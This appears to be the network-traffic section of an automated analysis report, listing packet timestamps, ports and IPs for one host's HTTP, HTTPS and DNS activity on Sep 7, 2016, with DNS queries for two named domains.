Sep 7, 2016 12:46:51.622020960 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.622703075 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.622725010 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.622854948 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.622890949 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.631259918 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.631280899 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.631498098 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.631541014 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.633363962 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.633387089 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.633574963 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.633609056 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644187927 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644222975 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644234896 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644403934 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.644438982 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644572973 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644589901 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644697905 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.644717932 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644732952 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644747019 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.644818068 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.649797916 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.649820089 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.649832010 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.650011063 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.650046110 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655255079 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655277967 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655406952 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655422926 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655430079 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.655447006 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655463934 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.655831099 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.658982038 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.659025908 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.659037113 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.659203053 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.665725946 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.665749073 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.665756941 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.665967941 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.666286945 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.666570902 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.666588068 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.666733980 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.666765928 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667668104 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667690992 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667705059 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667831898 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.667860031 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667983055 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.667999983 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.668101072 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.668124914 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.669154882 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.669177055 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.669224024 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.669368029 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.669403076 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.681157112 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.681179047 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.681391001 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.681423903 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.682431936 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.682449102 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.682461023 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.682642937 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.682677031 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.688311100 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.688327074 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.688527107 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.688560963 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.691612959 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.691634893 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.691797018 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.691831112 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696264029 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696285963 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696500063 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.696533918 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696751118 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696769953 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696778059 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.696880102 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.696906090 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.701015949 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.701036930 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.701236963 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.701271057 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.708168030 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.708189964 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.708353996 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.708386898 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.711541891 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.711563110 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.711759090 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.711793900 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.711908102 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.711926937 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.712054968 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.712081909 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.717297077 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.717319012 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.717514992 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.717550039 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747659922 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747685909 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747838020 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747858047 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747862101 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.747869015 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.747890949 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.748034000 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.748054981 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.748064995 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.748215914 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.748253107 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847417116 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847443104 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847459078 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847470045 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847599983 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847659111 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.847690105 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847786903 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847807884 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.847939014 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.847968102 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947204113 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947231054 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947249889 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947266102 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947277069 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:51.947454929 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:51.947494984 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047605991 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047632933 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047810078 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.047818899 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047838926 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047854900 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047875881 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.047957897 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.147242069 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147447109 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147468090 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147485971 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147500992 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147613049 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.147636890 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147677898 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.147722006 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147739887 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.147804976 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.147821903 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247095108 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247117043 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247127056 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247196913 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.247214079 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247296095 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247304916 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.247376919 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.247395039 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347630024 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347652912 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347660065 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347665071 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347702026 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347798109 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347810030 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.347846031 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.347879887 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.348850012 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.447092056 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.447256088 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.447273016 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.447288990 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.447308064 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.447396040 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.447432995 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547621012 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547642946 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547759056 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547774076 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547781944 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.547877073 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.547914028 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647187948 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647209883 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647218943 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647228956 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647237062 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647361994 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647377014 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647381067 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.647412062 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.647830963 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.747642994 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747762918 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747778893 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747867107 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747880936 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747889042 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.747890949 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.747920036 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.748405933 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.847249031 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847276926 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847286940 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847387075 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847403049 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847429991 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.847455978 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847501993 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847515106 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.847640038 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.847660065 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.947936058 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.947964907 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.947979927 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.947995901 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.948025942 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:52.948122025 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:52.948143005 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047274113 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047298908 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047355890 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047478914 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047493935 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.047509909 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:53.047558069 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.048034906 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:53.146912098 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147125006 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147142887 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147156954 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147166967 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147296906 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147313118 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147325039 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147361994 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:46:53.147480965 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:53.147804976 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:53.148402929 CEST	49206	80	192.168.1.22	176.9.16.213
Sep 7, 2016 12:46:53.148438931 CEST	80	49206	176.9.16.213	192.168.1.22
Sep 7, 2016 12:48:23.267086983 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:24.252248049 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:25.252137899 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:27.251607895 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:28.801621914 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801681042 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801707983 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801733017 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.820525885 CEST	50819	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:29.553364038 CEST	53	50819	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:29.557323933 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:29.557363033 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:29.557435989 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:29.561882973 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:29.561906099 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.691936016 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.691963911 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.691970110 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.692186117 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:30.692841053 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:30.692857981 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.693367004 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:48:30.892102957 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:31.229574919 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:48:31.267559052 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:31.391961098 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:31.595673084 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:31.595727921 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:31.597006083 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:31.597033978 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:31.597173929 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:31.597255945 CEST	443	49207	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:31.597362995 CEST	49207	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:34.678656101 CEST	60494	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:49:35.560075045 CEST	53	60494	8.8.8.8	192.168.1.22
Sep 7, 2016 12:49:35.574203014 CEST	56568	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:49:36.557745934 CEST	53	56568	8.8.8.8	192.168.1.22
Sep 7, 2016 12:49:36.559885025 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:36.559978008 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:36.560144901 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:36.561003923 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:36.561027050 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.640783072 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.640808105 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.640816927 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.640970945 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:37.641995907 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:37.642023087 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.643307924 CEST	443	49208	85.90.53.159	192.168.1.22
Sep 7, 2016 12:49:37.666043043 CEST	49208	443	192.168.1.22	85.90.53.159
Sep 7, 2016 12:49:37.703563929 CEST	443	49208	85.90.53.159	192.168.1.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 7, 2016 12:46:49.272285938 CEST	55511	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:46:49.952840090 CEST	53	55511	8.8.8.8	192.168.1.22
Sep 7, 2016 12:46:49.991893053 CEST	55160	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:46:50.554362059 CEST	53	55160	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:23.267086983 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:24.252248049 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:25.252137899 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:27.251607895 CEST	52026	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:28.801621914 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801681042 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801707983 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.801733017 CEST	53	52026	8.8.8.8	192.168.1.22
Sep 7, 2016 12:48:28.820525885 CEST	50819	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:48:29.553364038 CEST	53	50819	8.8.8.8	192.168.1.22
Sep 7, 2016 12:49:34.678656101 CEST	60494	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:49:35.560075045 CEST	53	60494	8.8.8.8	192.168.1.22
Sep 7, 2016 12:49:35.574203014 CEST	56568	53	192.168.1.22	8.8.8.8
Sep 7, 2016 12:49:36.557745934 CEST	53	56568	8.8.8.8	192.168.1.22

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 7, 2016 12:48:28.803469896 CEST	192.168.1.22	8.8.8.8	cf1a	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 7, 2016 12:46:49.272285938 CEST	192.168.1.22	8.8.8.8	0xb2d4	Standard query (0)	www.diefenbachgymnasium.at	A (IP address)	IN (0x0001)
Sep 7, 2016 12:46:49.991893053 CEST	192.168.1.22	8.8.8.8	0x7f9a	Standard query (0)	www.diefenbachgymnasium.at	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:23.267086983 CEST	192.168.1.22	8.8.8.8	0xd841	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
Sep 7, 2016 12:48:24.252248049 CEST	192.168.1.22	8.8.8.8	0xd841	Standard query (0)	www.multipassplus.eu	A (IP address)	IN (0x0001)
